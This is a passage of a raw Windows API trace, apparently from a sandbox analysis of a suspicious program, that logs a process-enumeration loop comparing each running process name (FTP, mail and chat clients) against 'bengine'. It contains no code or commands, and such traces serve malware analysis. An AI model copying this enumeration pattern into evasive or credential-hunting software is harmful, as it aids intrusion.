hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0101.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.368] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356f180 [0101.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x356f180, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0101.368] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0101.368] StrStrIA (lpFirst="invite.exe", lpSrch="bengine") returned 0x0 [0101.368] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0101.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0101.369] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356f108 [0101.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x356f108, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0101.369] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0101.369] StrStrIA (lpFirst="idol.exe", lpSrch="bengine") returned 0x0 [0101.369] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0101.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0101.385] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x357e528 [0101.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x357e528, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0101.385] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0101.385] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="bengine") returned 0x0 [0101.385] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0101.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0101.387] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x357e6e0 [0101.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x357e6e0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0101.387] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0101.387] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="bengine") returned 0x0 [0101.387] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0101.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0101.388] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x356f078 [0101.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x356f078, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0101.388] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0101.388] StrStrIA (lpFirst="powell_jane.exe", lpSrch="bengine") returned 0x0 [0101.388] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0101.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0101.390] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357ee80 [0101.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x357ee80, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0101.390] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0101.390] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="bengine") returned 0x0 [0101.390] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0101.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0101.391] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x356f090 [0101.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x356f090, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0101.391] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0101.391] StrStrIA (lpFirst="gainedshape.exe", lpSrch="bengine") returned 0x0 [0101.391] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0101.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0101.392] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357ef80 [0101.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x357ef80, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0101.392] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0101.392] StrStrIA (lpFirst="opens-versions.exe", lpSrch="bengine") returned 0x0 [0101.393] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0101.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0101.394] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x357e988 [0101.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x357e988, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0101.394] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0101.394] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="bengine") returned 0x0 [0101.394] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0101.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.395] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356f1b0 [0101.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x356f1b0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0101.395] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0101.395] StrStrIA (lpFirst="3dftp.exe", lpSrch="bengine") returned 0x0 [0101.395] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0101.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0101.396] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357ef40 [0101.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x357ef40, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0101.396] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0101.398] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="bengine") returned 0x0 [0101.398] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0101.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.399] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356f1c8 [0101.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x356f1c8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0101.399] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0101.399] StrStrIA (lpFirst="alftp.exe", lpSrch="bengine") returned 0x0 [0101.399] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0101.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.400] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356efa0 [0101.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x356efa0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0101.400] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0101.400] StrStrIA (lpFirst="barca.exe", lpSrch="bengine") returned 0x0 [0101.400] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0101.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.402] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356f1e0 [0101.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x356f1e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0101.402] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0101.402] StrStrIA (lpFirst="bitkinex.exe", lpSrch="bengine") returned 0x0 [0101.402] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0101.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.403] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356efb8 [0101.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x356efb8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0101.403] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0101.403] StrStrIA (lpFirst="coreftp.exe", lpSrch="bengine") returned 0x0 [0101.403] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0101.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0101.404] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e0e8 [0101.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x357e0e8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0101.405] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0101.405] StrStrIA (lpFirst="far.exe", lpSrch="bengine") returned 0x0 [0101.405] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0101.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.406] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356f1f8 [0101.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x356f1f8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0101.406] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0101.406] StrStrIA (lpFirst="filezilla.exe", lpSrch="bengine") returned 0x0 [0101.406] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0101.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.407] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356f168 [0101.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x356f168, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0101.407] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0101.407] StrStrIA (lpFirst="flashfxp.exe", lpSrch="bengine") returned 0x0 [0101.407] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0101.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.409] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356efd0 [0101.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x356efd0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0101.409] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0101.409] StrStrIA (lpFirst="fling.exe", lpSrch="bengine") returned 0x0 [0101.409] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0101.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0101.410] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357eea0 [0101.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x357eea0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0101.410] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0101.410] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="bengine") returned 0x0 [0101.410] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0101.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0101.411] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357ed60 [0101.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x357ed60, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0101.411] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0101.412] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="bengine") returned 0x0 [0101.412] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0101.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0101.413] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e0a8 [0101.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x357e0a8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0101.413] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0101.413] StrStrIA (lpFirst="icq.exe", lpSrch="bengine") returned 0x0 [0101.413] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0101.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.414] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356f0a8 [0101.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x356f0a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0101.414] lstrcpyA (in: 